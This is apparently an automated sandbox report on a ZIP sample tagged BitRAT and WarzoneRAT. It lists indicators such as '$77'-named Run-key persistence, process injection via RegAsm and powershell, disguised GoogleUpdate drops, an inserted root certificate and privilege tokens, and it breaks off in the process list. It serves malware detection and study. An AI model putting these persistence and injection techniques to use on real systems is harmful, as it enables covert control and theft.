Malware Analysis Report

2025-01-03 05:12

Sample ID 221215-qnkk6sfd7s
Target 8565653741.zip
SHA256 3e2465a42ff87f207327dce94ed7ca4f78c070481ebdb42056b4c10f0a65b6e1
Tags
bitrat warzonerat infostealer persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3e2465a42ff87f207327dce94ed7ca4f78c070481ebdb42056b4c10f0a65b6e1

Threat Level: Known bad

The file 8565653741.zip was found to be: Known bad.

Malicious Activity Summary

bitrat warzonerat infostealer persistence rat trojan

WarzoneRat, AveMaria

BitRAT

Suspicious use of NtCreateUserProcessOtherParentProcess

Executes dropped EXE

Modifies Installed Components in the registry

Checks computer location settings

Loads dropped DLL

Adds Run key to start application

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Drops file in Windows directory

Enumerates physical storage devices

Modifies data under HKEY_USERS

Modifies system certificate store

Modifies registry class

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Creates scheduled task(s)

Suspicious use of SendNotifyMessage

Suspicious use of UnmapMainImage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-12-15 13:24

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-12-15 13:24

Reported

2022-12-15 13:27

Platform

win7-20220812-en

Max time kernel

150s

Max time network

43s

Command Line

C:\Windows\system32\lsass.exe

Signatures

BitRAT

trojan bitrat

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1472 created 416 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe
PID 1624 created 416 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

WarzoneRat, AveMaria

rat infostealer warzonerat

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77INJECTOR = "C:\\Users\\Admin\\AppData\\Roaming\\$77INJECTOR\\$77INJECTOR.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77Install name = "C:\\Users\\Admin\\AppData\\Local\\$77Install path\\$77Install name" C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe N/A

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1476 set thread context of 1096 N/A C:\Windows\System32\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1472 set thread context of 1196 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1624 set thread context of 2144 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\SysWOW64\dllhost.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\GoogleUpdate.dll C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f0df48109110d901 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\cmd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77icaro.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\YourPhone.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1476 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 604 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\SysWOW64\cmd.exe
PID 1476 wrote to memory of 604 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\SysWOW64\cmd.exe
PID 1476 wrote to memory of 604 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\SysWOW64\cmd.exe
PID 1476 wrote to memory of 604 N/A C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe C:\Windows\SysWOW64\cmd.exe
PID 604 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 604 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 604 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 604 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1476 wrote to memory of 1452 N/A C:\Windows\System32\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1452 N/A C:\Windows\System32\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1452 N/A C:\Windows\System32\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1452 N/A C:\Windows\System32\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1452 N/A C:\Windows\System32\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1452 N/A C:\Windows\System32\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1452 N/A C:\Windows\System32\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1096 N/A C:\Windows\System32\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1096 N/A C:\Windows\System32\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1096 N/A C:\Windows\System32\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1096 N/A C:\Windows\System32\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1096 N/A C:\Windows\System32\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1096 N/A C:\Windows\System32\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1096 N/A C:\Windows\System32\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1096 N/A C:\Windows\System32\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1096 N/A C:\Windows\System32\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1096 N/A C:\Windows\System32\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1096 N/A C:\Windows\System32\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1476 wrote to memory of 1096 N/A C:\Windows\System32\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1096 wrote to memory of 1792 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1096 wrote to memory of 1792 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1096 wrote to memory of 1792 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1096 wrote to memory of 1792 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1096 wrote to memory of 524 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77Install.exe
PID 1096 wrote to memory of 524 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77Install.exe
PID 1096 wrote to memory of 524 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77Install.exe
PID 1096 wrote to memory of 524 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77Install.exe
PID 1096 wrote to memory of 524 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77Install.exe
PID 1096 wrote to memory of 524 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77Install.exe
PID 1096 wrote to memory of 524 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77Install.exe
PID 1096 wrote to memory of 1560 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
PID 1096 wrote to memory of 1560 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
PID 1096 wrote to memory of 1560 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
PID 1096 wrote to memory of 1560 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
PID 1096 wrote to memory of 1560 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
PID 1096 wrote to memory of 1560 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
PID 1096 wrote to memory of 1560 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
PID 1096 wrote to memory of 568 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe
PID 1096 wrote to memory of 568 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe
PID 1096 wrote to memory of 568 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe
PID 1096 wrote to memory of 568 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe
PID 1096 wrote to memory of 1572 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe
PID 1096 wrote to memory of 1572 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe
PID 1096 wrote to memory of 1572 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe
PID 1096 wrote to memory of 1572 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe
PID 1096 wrote to memory of 2008 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77icaro.exe
PID 1096 wrote to memory of 2008 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77icaro.exe
PID 1096 wrote to memory of 2008 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77icaro.exe
PID 1096 wrote to memory of 2008 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\$77icaro.exe
PID 2040 wrote to memory of 1472 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 2040 wrote to memory of 1472 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 2040 wrote to memory of 1472 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

Processes

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\services.exe

C:\Windows\system32\services.exe

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\lsm.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\Dwm.exe

"C:\Windows\system32\Dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation

C:\Windows\system32\sppsvc.exe

C:\Windows\system32\sppsvc.exe

